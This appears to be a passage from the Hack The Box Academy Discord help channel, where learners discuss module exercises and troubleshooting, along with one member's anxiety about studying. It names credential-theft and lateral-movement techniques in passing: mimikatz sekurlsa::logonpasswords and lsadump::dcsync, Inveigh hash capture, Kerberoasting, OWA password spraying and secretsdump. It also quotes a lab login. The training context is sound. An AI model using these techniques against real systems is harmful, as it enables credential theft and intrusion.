I'm having panic attacks and mental health issues about unrelated things to Hack the Box and it makes it harder to reread the text and focus on it and I'm thinking if I had a walkthrough of this one section that I could take notes on that way I can refresh my brain when I go onto the next section and run into the material when it gets reused later

I don't think spending 8 weeks trying to read a section and take notes over and over again is smart

its a focus issue I have had lately

so I want maybe if someone could help me understand the section and help me solve it this one time then maybe I can go to the next section tomorrow

just to give my brain a break while I resolve my anxiety issues

I am more than smart enough to get it that's not the issue

Chill bro it is just a question don't stress yourself like that

I'm stressed about other things besides Hack the Box and besides the question tho

and so forcing myself to read and take notes to understand how LSASS works isn't working because it requires effort on top of the anxiety

so I'm having trouble thinking about and understanding the section's text material

and my anxiety is causing it to take forever

I'm thinking once I revisit the information later I will get it just fine

so that's my issue

so long as in the short run I make sure I understand the why and how of this one section

The more you stress yourself the unlikely you will solve it
You need to chill your nerves and calm down

ya I know

so I think if someone could walk me through this one section tonight or now maybe then maybe I can go workout and start the next section tomorrow

just to help with restarting my brain if that makes sense to you

can someone DM me possibly about this?

a break would prob work better than a dm, even call it a day then come back with fresh eyes?

I know but I have been stuck on it for a long time, like a week or so

maybe I could start getting exercise again

i would help if i could, but im not on that module -_-

ok

well, who on this discord can DM me to help?

I want to make sure I know how LSASS works and that I understand the module

I mean this is the HTB Discord

OK dm
But you gotta take this day off tho

Like let's go through it tomorrow

ok sure

I'll talk to you tomorrow

thanks I just DMed you

ttyl guys I'm gonna take another break for a night

Sometimes taking a break is the hardest task

Hi, Im new too HTB and also this is my first time posting on Discord. I feel pretty silly posting this, as I cant get through Linux fundamentals. Im pretty sure ive got the answer correct. Which kernel version is installed on the system? im using "uname -r" and the result is 4.15.0-123-generic , the system says incorrect.

Welcome to lots of hitting head on keyboard. Shorten to the very minimal number. It be like that sometimes.. #.##.#

First module complete thankyou @muted pulsar

welcome!

When i ssh into the required IP, is it common for the connection to hang, im able to type 1 or 2 commands and then it just freezes, so I cose the terminal and log in again. Am i missing something?

yes this happens, it comes and goes just pause for a moment and carry on

so, dont close the session, just wait to see if it comes back online?

I'm in AD Enumeration & Attacks Skills Assessment Part 2 Question 9.

How long does it take to capture the hash after Invoking Inveigh? I've been waiting for 90 minutes 😩

I did Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

Hi all, I have finished the web fuzzing module and have just come to the skills assessment part. However, I can’t find the instructions. The only thing I see in the questions section is : "After completing all steps in the assessment, you will be presented with a page that contains a flag in the format of HTB{…}. What is that flag? " I don’t see any other questions on the screen. (check screenshot) I can see from similar threads that people are talking about finding subdomains and stuff like that but I don’t see any questions regarding that. One note is I am not using the pwnbox just replicating it on my local kali linux.

Anyone able to get the Introduction to Windows Evasion Techniques - Static Analysis Module - AES encryption - Rev shell to work? The decryption isn't working properly for me

i'm still having same issue doing section "privileged access" i'm trying to access the linux machine using the ip and the creds provided but its says access denied

htb-student@172.16.5.225's password:
Permission denied, please try again.

this is the creds i'm trying to use " htb-student:HTB_@cademy_stdnt"

I used ctrl+c to get out then it appeared for some odd reason

Are you sure that it copied correctly

😆

I usually right click the desktop first then paste @rocky estuary

Did that possibly work?

I think I may have found the problem. I swear I'm gonna look really stupid if this works.

Bloody hell! I found the problem, and I got it in five seconds! Ugh!!!

bruh i was ctrl+v the whole time zzzzzzzzzzzzzzzzzz

What was it

i forget u can paste with right click i just hate windows at this point

Yup, test the output on a normal cmdline to see what’s happening behind the password prompt

I forgot to run PS as administrator 😩😩😩🤦🏽‍♂️🤦🏽‍♂️🤦🏽‍♂️

i don't why its work on cmd like when u type a command but when ssh ask for a password ctrl + v dosen't work u gotta use right click for some reason

Hey all... Noob here but lovin it... Quick Question...Only on Cracking into HTB Mod...Got the first few flags, but when in POST I have ran out of things to do... I am not using pawnbox, I am using my own kali machine, would that keep me from finding flag???

Im having problems wit this: What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k? Ive tried : find /etc -type f -name "*.conf" -newermt 2020-03-03 -size +25k -size -28k I received th error: find: paths must precede expression 'size'

which module

Web Requests in cracking in to HTB

dont limit the search to /etc

and also remove any permissions denied messages with 2>/dev/null at the end

whats the problem

did you get a cookie first?

yes... probably just not understanding what the question is... I know how to navigate just dont know what its asking for...lol

use the search feature and lookup flag

with curl btw

so i tried: find -type f -newermt 2020-03-03 -size +25k -size -28k 2>/dev/null
and received no results

you forgot to specify where to start searching from

got it, thankyou

cool lemme try a little longer...thnx

WOW LMAO..... hours of looking through EVERYTHING...Searching EVERY City around London and never thought to search flag..... Thnks lmao

yeah, that question is really easy to read the wrong way

Yeah but still right in front of my eyes...lol... Gotta tighten up

Which ACE entry can be leveraged to perform a targeted Kerberoasting attack? should'nt this be genericwrite?

there are several

can write spn or something like that

Hey guys qq I'm working on the sqlmap essentials in the " running sqlmap on a http request " section and I'm trying to put in for the cookie param and I'm not sure if I'm putting it in correctly should it be " sqlmap webpage --data='id=1' --cookie= '' " ?

It attaches spn to an ad user.

yes

that's how you can target for kerberoasting

it says answer wrong thou

spin up a windows vm and look

hahaha I struggled too there because I agree, GenericWrite is enough.
Try all of the ones you see on the page, one of them works

I'm getting this error running an exploit on metasploit: Without a database connected that payload UUID tracking will not work! Does anyone know what this means?

What's the error...

what the solve ?

it's for Attacking Common Applications Module

your picture shows the error, it says the target is not vulnerable to that exploit.

what can i do?

probably find an exploit the target is vulnerable to. if the module is telling you to use eternalblue, there are several different versions

oh ok

i try another modul like the error

its best to include the module/section you're on, i'm not really sure what you're trying to do so it's hard to provide help

i have academy for metasploit and i do everything to get the answer and i have this erorr

both module and section

module/39/section/407

well i'm not looking that up

just say the section my guy

that the section

it says exploit apache not smb

Have you tried googling that msf error? First result for me is a rapid7 blog

It's way easier to say the module name and section name to others as anyone helping would most likely have notes by module name and section, not random arbitrary numbers

Hey guys I'm new, I know 0 in cyber security any hope?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

same here

Follow the link above 🙂 ☝️

thanks

when a module is updated, on my dashboard, I can see that the progress bar is no longer complete and I can no longer "view" my achievement but can only "continue" - is this expected?

for context, I'm going through the CPTS path

having some trouble with the exchange module, the password spraying OWA section - do I need to do anything for setup for Ruler? no valid passwords found with || Domainyear! and I tried 2020-2024!, as well as all seasons2024! and username:username. I feel like it should likely be one of these, and it is maybe not contacting the endpoint properly? I tried with both mailsniper and domain\username users list file, and ruler ||

I should start with this before the modules right??

Yup

In the AD Enum Skills Assessment Part 1, IIS on the pivot machine is literally denying that a file I personally dropped on the target exists. I managed to get Inveigh into C:\inetpub\wwwroot\uploads and verified that it exists by going to the uploads directory on that machine in a web browser to view the directory listing. However, if I then go on to click on the link to the Inveigh.ps1 file in the directory listing, I am met with a 404 error. Why is this, and is there any way around it for getting Inveigh onto MS01 for further enumeration?

any hints / ideas? I verified the autodiscover endpoint to be in the expected standard location with ntlmscan

Im trying to do this: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. I ran "curl -s https://www.inlanefreight.com > website_source.html " next i ran "
grep -oP '(?<=href=")[^"]*' website_source.html | grep -E '^/|^https://www.inlanefreight.com' | sort | uniq > paths.txt" then i was simply going to run "wc -l paths.txt" , but paths.txt is empty, something wrong with my grep command

Why are you trying to do that through a browser?

Don’t you have a system shell already on it?

Yes that is expected. IIRC, if you have the badge it still counts as completed in terms for path progression for being eligible to take the exam.

I'm using the Meterpreter payload that I have running on it as the SOCKS pivot server (along with python3 -m http.server) to drop it, but I'm using the browser to verify that it's there after the drop. Directory listing at /upload says it's there, but clicking on the directory listing throws a 404.

Maybe it has a cleanup script, you have 100s of other folders to put it in

awesome, that's what I wanted to know. I'll probably "re-complete" it anyway because I'll need a reminder before the exam, but good to know I don't have to. thankyou

Sometimes it helps to run something first before piping it to another.

I'm trying to transfer the file from WEB01 to MS01. Can't do that easily from a non-webhosted directory.

You don’t have any upload tools like evil-winrm or meterpreter?

Meterpreter on WEB01 running SOCKS, but RDP into MS01 which isn't much help for file transfers. Evil-WinRM is timing out on all attempts to connect through proxychains.

Rdp should work fine using share drive or just copy and pasting the file

You should also learn ligolo, meterpreter pivoting is a pain

Fun tip for xfreerdp /drive:<path>,<name> that will give you a share on the RDP machine from your host

I reviewed this module earlier because my notes were wrong, was able to complete it way faster now than the silly way I did it over a year ago. Ligolo

In my case it's wlfreerdp because I'm using Wayland on my attack machine, but still works regardless, thanks.

Hi. I have been stuck on the exercises of the Linux fundamentals module in the filter contents section and I can't complete any of the three exercises. Could someone help me?

Update: found the ||t*y|| hash and cracking it now, but rockyou.txt is taking far longer than it should in both JtR on my desktop and Hashcat on my M1 MBP; is there another wordlist it would be in?

its looking for a cleartext password

Right, which you need to crack a hash to obtain, no?

not in this case, but tbf they do mean it like that most times

Well that's interesting then because mimikatz sure as hell didn't display anything at all related to this user, even if I ran token::elevate first prior to running sekurlsa::logonpasswords. Which begs the question: if there's no permission to run lsadump::dcsync (yet) then what other mimikatz commands are there that would display it? Or does one need to use a completely different tool to find it?

Update: found it earlier using something else and didn't even know it.

nxc

Right. Yeah, it was associated with a completely different user in that case though, for whatever reason.

Parameter Logic Bugs module, skill assessment
The flag is in one of the sections within one of the modules. Try to find enough logic bugs to get to it.
I'm stuck here, can somone please give me a hint on this?

Thanks

Can I ask something ?because I am thinking about buying it, is it good module/worth the money ?I am going as Application security engineer .

What are you stuck on? Dm me if you’d like

I liked it

doing the exam soon?

just a question is it beter to get a student member ship or gold is considering getiing monthly

anyone who tried those

This gives you an idea of the costs and what you get from them. https://help.hackthebox.com/en/articles/5720974-academy-subscriptions

It will come down to what your goals and needs are.

Having a problem with the "Using web proxies" module, on the "intercepting responses" section

When intercepting the POST response to /ping, it doesn't intercept the correct response, instead it intercepts this

did you forward it?

For some reason is intercepting the response to a /favicon.ico, when the request doesn't send to that

Yes, thats the response when i forward the above petition

I tried using pwnbox but it's the same there

try restarting it

it's normal, when you open a webpage in your brower it will send a request to get the favicon

just turn on intercept before you visit the page

Isn't working

What is the difference between running a process and running it as admin in the context of a standard user?
Does this works as sudo for windows?

im not getting that response, what browser are you running on?

Are these proxyshell exploits questionably functional in the Exchange module on Vulns ? I can't get it to pull the SID and complete the exploit

Firefox

I will try with the burpsuite browser

yes

firefox loads many random requests
just use burp browser

Same on burp browser

and how are these rights assigned?

security tokens

works fine

turn on intercept before you click the ping button

@next bronze

Yup works fine

so not every process can be run as admin?

A process is started with the user's privileges

suh

Yes when i send it to repeater and send the request it works fine

BUt im trying to follow the academy

Can also just do it normally and then look at the request in http history

Instead of intercepting

It says you refresh, click forward and should intercept the response to able to change it, but for some reason for me isn't working, is intercepts a response to /favicon.ico when forwarding the request

So i enable intercepet response, refresh the page, intercept the request and forward

Yeah your browser always makes a connection to /favicon.ico first before any other traffic

did you turn on response interception in the settings

I've already said that

banned

Yes

I tried burp's browser and its the same

they will never prove my guilt in court

tick the second and third option

Ok it was that

Still cant see this

that you need to refresh the page

?

Reload the site

Yes i reload the site

yeah then find it in the response

YEye got it, i was reloading under the /ping

Tanks guys, i understand it incorrectly, thought you had to intercept the response of the /ping, but it was actually from the root directory, hehe sorry

Hello Everyone, I am doing the DcSync Module of HackTheBox I want to run secretsdump.py but the file is not present there

restart the machine

Okay

hmm what?

secretsdump.py is not present in windows, run in from your attack box

We have to use our attackbox? I didn't Knew that sorry. Is there any way instead of using attack box I can use my kali machine?

your kali machine is the attack box

No No, By my kali I mean the machine I have installed In Vmware

You can download the vpn

I have connected the Vpn

Okay Let Me Try

we're talking about the same thing